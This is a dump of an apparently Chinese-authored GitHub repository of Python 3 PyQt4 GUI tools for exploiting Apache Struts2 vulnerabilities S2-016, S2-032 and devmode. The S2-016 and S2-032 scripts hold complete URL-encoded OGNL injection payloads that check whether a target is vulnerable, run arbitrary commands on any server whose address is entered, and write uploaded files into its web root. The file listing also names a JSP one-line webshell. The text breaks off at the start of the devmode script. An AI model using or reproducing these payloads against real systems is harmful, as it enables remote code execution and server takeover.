├── .gitattributes ├── .gitignore ├── S2-016利用工具(Python 3) ├── PoC(检测是否存在漏洞).png ├── S2-016.py ├── s2016.py ├── 执行命令.png ├── 文件上传.png ├── 未存在漏洞.png └── 程序界面.png ├── S2-032利用工具(Python 3) ├── PoC(检测是否存在漏洞).png ├── S2-032利用工具.py ├── s2032.py ├── 执行命令.png ├── 报错.png ├── 文件上传.png ├── 未存在漏洞.png └── 程序界面.png ├── S2-devmode漏洞利用工具(Python 3) ├── PoC.png ├── S2-devmode漏洞利用工具.py ├── s2devmode.py ├── 手工测试.png ├── 手工测试2.png ├── 执行命令.png ├── 执行命令2.png ├── 文件上传1.png ├── 文件上传1验证.png ├── 文件上传2.png ├── 文件上传2验证.png ├── 站点2-执行命令.png └── 编写参考.txt ├── Strust2漏洞 EXP代码.txt └── 一句话木马(工具中可能使用).jsp /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *,cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask instance folder 57 | instance/ 58 | 59 | # Scrapy stuff: 60 | .scrapy 61 | 62 | # Sphinx documentation 63 | docs/_build/ 64 | 65 | # PyBuilder 66 | target/ 67 | 68 | # IPython Notebook 69 | .ipynb_checkpoints 70 | 71 | # pyenv 72 | .python-version 73 | 74 | # celery beat schedule file 75 | celerybeat-schedule 76 | 77 | # dotenv 78 | .env 79 | 80 | # virtualenv 81 | venv/ 82 | ENV/ 83 | 84 | # Spyder project settings 85 | .spyderproject 86 | 87 | # Rope project settings 88 | .ropeproject 89 | 90 | # ========================= 91 | # Operating System Files 92 | # ========================= 93 | 94 | # OSX 95 | # ========================= 96 | 97 | .DS_Store 98 | .AppleDouble 99 | .LSOverride 100 | 101 | # Thumbnails 102 | ._* 103 | 104 | # Files that might appear in the root of a volume 105 | .DocumentRevisions-V100 106 | .fseventsd 107 | .Spotlight-V100 108 | .TemporaryItems 109 | .Trashes 110 | .VolumeIcon.icns 111 | 112 | # Directories potentially created on remote AFP share 113 | .AppleDB 114 | .AppleDesktop 115 | Network Trash Folder 116 | Temporary Items 117 | .apdisk 118 | 119 | # Windows 120 | # ========================= 121 | 122 | # Windows image file caches 123 | Thumbs.db 124 | ehthumbs.db 125 | 126 | # Folder config file 127 | Desktop.ini 128 | 129 | # Recycle Bin used on file shares 130 | $RECYCLE.BIN/ 131 | 132 | # Windows Installer files 133 | *.cab 134 | *.msi 135 | *.msm 136 | *.msp 137 | 138 | # Windows shortcuts 139 | *.lnk 140 | -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/PoC(检测是否存在漏洞).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/PoC(检测是否存在漏洞).png -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/S2-016.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | import sys 3 | from PyQt4 import QtCore, QtGui, QtWebKit 4 | from s2016 import Ui_MainWindow 5 | import urllib.request 6 | import urllib.parse 7 | import urllib 8 | import requests 9 | 10 | class StartQt4(QtGui.QMainWindow): 11 | def __init__(self, parent=None): 12 | QtGui.QWidget.__init__(self, parent) 13 | self.ui = Ui_MainWindow() #框主题名称 14 | self.ui.setupUi(self) 15 | QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go) 16 | QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go) 17 | QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode) 18 | QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog) 19 | 20 | def PoC(self): 21 | payload = "?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D" 22 | target_url = (self.address + payload) 23 | #print(target_url) 24 | try: 25 | req = urllib.request.Request(target_url, method = "GET") 26 | response = urllib.request.urlopen(req) 27 | if response: 28 | data = response.read() 29 | data = str(data, encoding = "utf-8") 30 | self.ui.textBrowser.setText("测试结果:\n%s" %(data)) #将结果输出至textBrowser 31 | except Exception as e: 32 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 33 | 34 | def cmd(self): 35 | self.command = str(self.ui.command.text()) 36 | #payload = "%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{command})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()".format(command = self.command) 37 | payload = "?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{" + '"' + self.command + '"'+ "})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23mat.getWriter().close()}" 38 | target_url = (self.address + payload) 39 | #print(target_url) 40 | try: 41 | req = requests.get(target_url) 42 | data = req.content 43 | #print(data) 44 | data = str(data, encoding = "utf-8") 45 | self.ui.textBrowser.setText("%s命令执行结果:\n%s" %(self.command, data.rstrip())) #将结果输出至textBrowser 46 | except Exception as e: 47 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 48 | 49 | def Go(self): 50 | self.address = str(self.ui.lineEdit.text()) 51 | if self.address: 52 | if self.address.find('://') == -1: 53 | self.address = 'http://' + self.address 54 | if self.ui.comboBox.currentIndex() == 0: 55 | self.PoC() 56 | if self.ui.comboBox.currentIndex() == 1: 57 | self.cmd() 58 | elif self.ui.comboBox.currentIndex() == 2: 59 | self.upload() 60 | 61 | def file_dialog(self): 62 | fd = QtGui.QFileDialog(self) 63 | self.file = fd.getOpenFileName() 64 | from os.path import isfile 65 | if isfile(self.file): 66 | import codecs 67 | text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框 68 | self.filename = str(self.ui.filename.text()) 69 | 70 | def upload(self): 71 | content = (open(self.file, "r").read()) 72 | data = {"t":content} 73 | #print(content) 74 | payload = "?redirect:${{%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3dfalse%2c%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22%5d%2c%23b%3dnew+java.io.FileOutputStream(new+java.lang.StringBuilder(%23a.getRealPath(%22/%22)).append(@java.io.File@separator).append(%22"+ self.filename + '%22))%2c%23b.write(%23a.getParameter("t").getBytes())%2c%23b.close%28%29%2c%23p%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%5d.getWriter%28%29%2c%23p.println%28%22DONE%22%29%2c%23p.flush%28%29%2c%23p.close%28%29}}' 75 | #payload = payload.replace(' ', '') 76 | #print(payload) 77 | target_url = (self.address + payload) 78 | try: 79 | #print(target_url) 80 | req = urllib.request.Request(target_url, urllib.parse.urlencode(data).encode("UTF-8"), method = "POST") 81 | response = urllib.request.urlopen(req) 82 | data = response.read() 83 | data = str(data, encoding = "utf-8") 84 | self.ui.textBrowser.setText("上传成功,文件已上传至网站根目录下:\n%s" %(data)) #将结果输出至textBrowser 85 | except Exception as e: 86 | #print(e) 87 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 88 | def mode(self): 89 | self.ui.comboBox.currentIndex() 90 | 91 | 92 | 93 | if __name__ == "__main__": 94 | app = QtGui.QApplication(sys.argv) 95 | myapp = StartQt4() 96 | myapp.show() 97 | sys.exit(app.exec_()) 98 | -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/s2016.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Form implementation generated from reading ui file 's2016.ui' 4 | # 5 | # Created by: PyQt4 UI code generator 4.11.4 6 | # 7 | # WARNING! All changes made in this file will be lost! 8 | 9 | from PyQt4 import QtCore, QtGui 10 | 11 | try: 12 | _fromUtf8 = QtCore.QString.fromUtf8 13 | except AttributeError: 14 | def _fromUtf8(s): 15 | return s 16 | 17 | try: 18 | _encoding = QtGui.QApplication.UnicodeUTF8 19 | def _translate(context, text, disambig): 20 | return QtGui.QApplication.translate(context, text, disambig, _encoding) 21 | except AttributeError: 22 | def _translate(context, text, disambig): 23 | return QtGui.QApplication.translate(context, text, disambig) 24 | 25 | class Ui_MainWindow(object): 26 | def setupUi(self, MainWindow): 27 | MainWindow.setObjectName(_fromUtf8("MainWindow")) 28 | MainWindow.resize(866, 402) 29 | font = QtGui.QFont() 30 | font.setFamily(_fromUtf8("宋体")) 31 | font.setPointSize(10) 32 | font.setBold(True) 33 | font.setWeight(75) 34 | MainWindow.setFont(font) 35 | self.centralwidget = QtGui.QWidget(MainWindow) 36 | self.centralwidget.setObjectName(_fromUtf8("centralwidget")) 37 | self.lineEdit = QtGui.QLineEdit(self.centralwidget) 38 | self.lineEdit.setGeometry(QtCore.QRect(20, 20, 721, 31)) 39 | self.lineEdit.setObjectName(_fromUtf8("lineEdit")) 40 | self.pushButton = QtGui.QPushButton(self.centralwidget) 41 | self.pushButton.setGeometry(QtCore.QRect(760, 20, 71, 31)) 42 | self.pushButton.setObjectName(_fromUtf8("pushButton")) 43 | self.textBrowser = QtGui.QTextBrowser(self.centralwidget) 44 | self.textBrowser.setGeometry(QtCore.QRect(20, 120, 811, 221)) 45 | font = QtGui.QFont() 46 | font.setFamily(_fromUtf8("宋体")) 47 | self.textBrowser.setFont(font) 48 | self.textBrowser.setObjectName(_fromUtf8("textBrowser")) 49 | self.comboBox = QtGui.QComboBox(self.centralwidget) 50 | self.comboBox.setGeometry(QtCore.QRect(130, 70, 101, 31)) 51 | self.comboBox.setObjectName(_fromUtf8("comboBox")) 52 | self.comboBox.addItem(_fromUtf8("")) 53 | self.comboBox.addItem(_fromUtf8("")) 54 | self.comboBox.addItem(_fromUtf8("")) 55 | self.filename = QtGui.QLineEdit(self.centralwidget) 56 | self.filename.setGeometry(QtCore.QRect(580, 70, 131, 31)) 57 | self.filename.setObjectName(_fromUtf8("filename")) 58 | self.label = QtGui.QLabel(self.centralwidget) 59 | self.label.setGeometry(QtCore.QRect(460, 70, 101, 31)) 60 | font = QtGui.QFont() 61 | font.setFamily(_fromUtf8("宋体")) 62 | font.setPointSize(10) 63 | font.setBold(True) 64 | font.setWeight(75) 65 | self.label.setFont(font) 66 | self.label.setObjectName(_fromUtf8("label")) 67 | self.pushButton_2 = QtGui.QPushButton(self.centralwidget) 68 | self.pushButton_2.setGeometry(QtCore.QRect(720, 70, 111, 31)) 69 | self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) 70 | self.label_2 = QtGui.QLabel(self.centralwidget) 71 | self.label_2.setGeometry(QtCore.QRect(20, 70, 101, 31)) 72 | font = QtGui.QFont() 73 | font.setFamily(_fromUtf8("宋体")) 74 | font.setPointSize(10) 75 | font.setBold(True) 76 | font.setWeight(75) 77 | self.label_2.setFont(font) 78 | self.label_2.setObjectName(_fromUtf8("label_2")) 79 | self.label_3 = QtGui.QLabel(self.centralwidget) 80 | self.label_3.setGeometry(QtCore.QRect(260, 70, 61, 31)) 81 | self.label_3.setObjectName(_fromUtf8("label_3")) 82 | self.command = QtGui.QLineEdit(self.centralwidget) 83 | self.command.setGeometry(QtCore.QRect(330, 70, 111, 31)) 84 | self.command.setObjectName(_fromUtf8("command")) 85 | MainWindow.setCentralWidget(self.centralwidget) 86 | self.menubar = QtGui.QMenuBar(MainWindow) 87 | self.menubar.setGeometry(QtCore.QRect(0, 0, 866, 26)) 88 | self.menubar.setObjectName(_fromUtf8("menubar")) 89 | MainWindow.setMenuBar(self.menubar) 90 | self.statusbar = QtGui.QStatusBar(MainWindow) 91 | self.statusbar.setObjectName(_fromUtf8("statusbar")) 92 | MainWindow.setStatusBar(self.statusbar) 93 | 94 | self.retranslateUi(MainWindow) 95 | QtCore.QMetaObject.connectSlotsByName(MainWindow) 96 | 97 | def retranslateUi(self, MainWindow): 98 | MainWindow.setWindowTitle(_translate("MainWindow", "S2-016利用工具 Coder: crown prince", None)) 99 | self.pushButton.setText(_translate("MainWindow", "Go", None)) 100 | self.comboBox.setItemText(0, _translate("MainWindow", "PoC", None)) 101 | self.comboBox.setItemText(1, _translate("MainWindow", "执行命令", None)) 102 | self.comboBox.setItemText(2, _translate("MainWindow", "文件上传", None)) 103 | self.label.setText(_translate("MainWindow", "上传文件名:", None)) 104 | self.pushButton_2.setText(_translate("MainWindow", " 选择文件:", None)) 105 | self.label_2.setText(_translate("MainWindow", " 模式选择:", None)) 106 | self.label_3.setText(_translate("MainWindow", "命令:", None)) 107 | 108 | -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/执行命令.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/执行命令.png -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/文件上传.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/文件上传.png -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/未存在漏洞.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/未存在漏洞.png -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/程序界面.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/程序界面.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/PoC(检测是否存在漏洞).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/PoC(检测是否存在漏洞).png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/S2-032利用工具.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | import sys 3 | from PyQt4 import QtCore, QtGui, QtWebKit 4 | from s2032 import Ui_MainWindow 5 | import urllib.request 6 | import urllib.parse 7 | import urllib 8 | 9 | class StartQt4(QtGui.QMainWindow): 10 | def __init__(self, parent=None): 11 | QtGui.QWidget.__init__(self, parent) 12 | self.ui = Ui_MainWindow() #框主题名称 13 | self.ui.setupUi(self) 14 | QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go) 15 | QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go) 16 | QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode) 17 | QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog) 18 | 19 | def PoC(self): 20 | payload= "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23parameters.content[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content=S2-032%20dir--***" 21 | target_url = (self.address + payload) 22 | #print(target_url) 23 | try: 24 | req = urllib.request.Request(target_url, method = "GET") 25 | response = urllib.request.urlopen(req) 26 | if response: 27 | data = response.read() 28 | data = str(data, encoding = "utf-8") 29 | self.ui.textBrowser.setText("测试结果:\n%s" %(data)) #将结果输出至textBrowser 30 | except Exception as e: 31 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 32 | 33 | def cmd(self): 34 | self.command = str(self.ui.command.text()) 35 | payload= "?method:%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%23parameters.command%5B0%5D%29.getInputStream%28%29%2c%23b%3dnew%20java.io.InputStreamReader%28%23a%29%2c%23c%3dnew%20java.io.BufferedReader%28%23b%29%2c%23d%3dnew%20char%5B51020%5D%2c%23c.read%28%23d%29%2c%23kxlzx%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%29%2c%23kxlzx.close&command=" 36 | target_url = (self.address + payload + self.command) 37 | #print(target_url) 38 | try: 39 | req = urllib.request.Request(target_url, method = "GET") 40 | response = urllib.request.urlopen(req) 41 | data = response.read() 42 | data = str(data, encoding = "utf-8") 43 | self.ui.textBrowser.setText("%s命令执行结果:\n%s" %(self.command, data.rstrip())) #将结果输出至textBrowser 44 | except Exception as e: 45 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 46 | 47 | def Go(self): 48 | self.address = str(self.ui.lineEdit.text()) 49 | if self.address: 50 | if self.address.find('://') == -1: 51 | self.address = 'http://' + self.address 52 | if self.ui.comboBox.currentIndex() == 0: 53 | self.PoC() 54 | if self.ui.comboBox.currentIndex() == 1: 55 | self.cmd() 56 | elif self.ui.comboBox.currentIndex() == 2: 57 | self.upload() 58 | 59 | def file_dialog(self): 60 | fd = QtGui.QFileDialog(self) 61 | self.file = fd.getOpenFileName() 62 | from os.path import isfile 63 | if isfile(self.file): 64 | import codecs 65 | text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框 66 | self.filename = str(self.ui.filename.text()) 67 | 68 | def upload(self): 69 | content = (open(self.file, "r").read()) 70 | #print(content) 71 | temp = "&reqobj=%s&content=%s" %(self.filename, content) 72 | payload = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f" 73 | #payload = payload.replace(' ', '') 74 | #print(payload) 75 | target_url = (self.address + payload + temp) 76 | try: 77 | #print(target_url) 78 | req = urllib.request.Request(target_url, method = "GET") 79 | response = urllib.request.urlopen(req) 80 | data = response.read() 81 | data = str(data, encoding = "utf-8") 82 | self.ui.textBrowser.setText("上传成功,文件路径是:\n%s" %(data)) #将结果输出至textBrowser 83 | except Exception as e: 84 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 85 | def mode(self): 86 | self.ui.comboBox.currentIndex() 87 | 88 | 89 | 90 | if __name__ == "__main__": 91 | app = QtGui.QApplication(sys.argv) 92 | myapp = StartQt4() 93 | myapp.show() 94 | sys.exit(app.exec_()) 95 | -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/s2032.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Form implementation generated from reading ui file 's2032.ui' 4 | # 5 | # Created by: PyQt4 UI code generator 4.11.4 6 | # 7 | # WARNING! All changes made in this file will be lost! 8 | 9 | from PyQt4 import QtCore, QtGui 10 | 11 | try: 12 | _fromUtf8 = QtCore.QString.fromUtf8 13 | except AttributeError: 14 | def _fromUtf8(s): 15 | return s 16 | 17 | try: 18 | _encoding = QtGui.QApplication.UnicodeUTF8 19 | def _translate(context, text, disambig): 20 | return QtGui.QApplication.translate(context, text, disambig, _encoding) 21 | except AttributeError: 22 | def _translate(context, text, disambig): 23 | return QtGui.QApplication.translate(context, text, disambig) 24 | 25 | class Ui_MainWindow(object): 26 | def setupUi(self, MainWindow): 27 | MainWindow.setObjectName(_fromUtf8("MainWindow")) 28 | MainWindow.resize(866, 402) 29 | font = QtGui.QFont() 30 | font.setFamily(_fromUtf8("宋体")) 31 | font.setPointSize(10) 32 | font.setBold(True) 33 | font.setWeight(75) 34 | MainWindow.setFont(font) 35 | self.centralwidget = QtGui.QWidget(MainWindow) 36 | self.centralwidget.setObjectName(_fromUtf8("centralwidget")) 37 | self.lineEdit = QtGui.QLineEdit(self.centralwidget) 38 | self.lineEdit.setGeometry(QtCore.QRect(20, 20, 721, 31)) 39 | self.lineEdit.setObjectName(_fromUtf8("lineEdit")) 40 | self.pushButton = QtGui.QPushButton(self.centralwidget) 41 | self.pushButton.setGeometry(QtCore.QRect(760, 20, 71, 31)) 42 | self.pushButton.setObjectName(_fromUtf8("pushButton")) 43 | self.textBrowser = QtGui.QTextBrowser(self.centralwidget) 44 | self.textBrowser.setGeometry(QtCore.QRect(20, 120, 811, 221)) 45 | font = QtGui.QFont() 46 | font.setFamily(_fromUtf8("宋体")) 47 | self.textBrowser.setFont(font) 48 | self.textBrowser.setObjectName(_fromUtf8("textBrowser")) 49 | self.comboBox = QtGui.QComboBox(self.centralwidget) 50 | self.comboBox.setGeometry(QtCore.QRect(130, 70, 101, 31)) 51 | self.comboBox.setObjectName(_fromUtf8("comboBox")) 52 | self.comboBox.addItem(_fromUtf8("")) 53 | self.comboBox.addItem(_fromUtf8("")) 54 | self.comboBox.addItem(_fromUtf8("")) 55 | self.filename = QtGui.QLineEdit(self.centralwidget) 56 | self.filename.setGeometry(QtCore.QRect(580, 70, 131, 31)) 57 | self.filename.setObjectName(_fromUtf8("filename")) 58 | self.label = QtGui.QLabel(self.centralwidget) 59 | self.label.setGeometry(QtCore.QRect(460, 70, 101, 31)) 60 | font = QtGui.QFont() 61 | font.setFamily(_fromUtf8("宋体")) 62 | font.setPointSize(10) 63 | font.setBold(True) 64 | font.setWeight(75) 65 | self.label.setFont(font) 66 | self.label.setObjectName(_fromUtf8("label")) 67 | self.pushButton_2 = QtGui.QPushButton(self.centralwidget) 68 | self.pushButton_2.setGeometry(QtCore.QRect(720, 70, 111, 31)) 69 | self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) 70 | self.label_2 = QtGui.QLabel(self.centralwidget) 71 | self.label_2.setGeometry(QtCore.QRect(20, 70, 101, 31)) 72 | font = QtGui.QFont() 73 | font.setFamily(_fromUtf8("宋体")) 74 | font.setPointSize(10) 75 | font.setBold(True) 76 | font.setWeight(75) 77 | self.label_2.setFont(font) 78 | self.label_2.setObjectName(_fromUtf8("label_2")) 79 | self.label_3 = QtGui.QLabel(self.centralwidget) 80 | self.label_3.setGeometry(QtCore.QRect(260, 70, 61, 31)) 81 | self.label_3.setObjectName(_fromUtf8("label_3")) 82 | self.command = QtGui.QLineEdit(self.centralwidget) 83 | self.command.setGeometry(QtCore.QRect(330, 70, 111, 31)) 84 | self.command.setObjectName(_fromUtf8("command")) 85 | MainWindow.setCentralWidget(self.centralwidget) 86 | self.menubar = QtGui.QMenuBar(MainWindow) 87 | self.menubar.setGeometry(QtCore.QRect(0, 0, 866, 26)) 88 | self.menubar.setObjectName(_fromUtf8("menubar")) 89 | MainWindow.setMenuBar(self.menubar) 90 | self.statusbar = QtGui.QStatusBar(MainWindow) 91 | self.statusbar.setObjectName(_fromUtf8("statusbar")) 92 | MainWindow.setStatusBar(self.statusbar) 93 | 94 | self.retranslateUi(MainWindow) 95 | QtCore.QMetaObject.connectSlotsByName(MainWindow) 96 | 97 | def retranslateUi(self, MainWindow): 98 | MainWindow.setWindowTitle(_translate("MainWindow", "S2-032利用工具 Coder: crown prince", None)) 99 | self.pushButton.setText(_translate("MainWindow", "Go", None)) 100 | self.comboBox.setItemText(0, _translate("MainWindow", "PoC", None)) 101 | self.comboBox.setItemText(1, _translate("MainWindow", "执行命令", None)) 102 | self.comboBox.setItemText(2, _translate("MainWindow", "文件上传", None)) 103 | self.label.setText(_translate("MainWindow", "上传文件名:", None)) 104 | self.pushButton_2.setText(_translate("MainWindow", " 选择文件:", None)) 105 | self.label_2.setText(_translate("MainWindow", " 模式选择:", None)) 106 | self.label_3.setText(_translate("MainWindow", "命令:", None)) 107 | 108 | -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/执行命令.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/执行命令.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/报错.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/报错.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/文件上传.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/文件上传.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/未存在漏洞.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/未存在漏洞.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/程序界面.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/程序界面.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/PoC.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/PoC.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/S2-devmode漏洞利用工具.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | import sys 3 | from PyQt4 import QtCore, QtGui, QtWebKit 4 | from s2devmode import Ui_MainWindow 5 | import urllib.request 6 | import urllib.parse 7 | import urllib 8 | import requests 9 | 10 | class StartQt4(QtGui.QMainWindow): 11 | def __init__(self, parent=None): 12 | QtGui.QWidget.__init__(self, parent) 13 | self.ui = Ui_MainWindow() #框主题名称 14 | self.ui.setupUi(self) 15 | QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go) 16 | QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go) 17 | QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode) 18 | QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog) 19 | 20 | def PoC(self): 21 | payload= 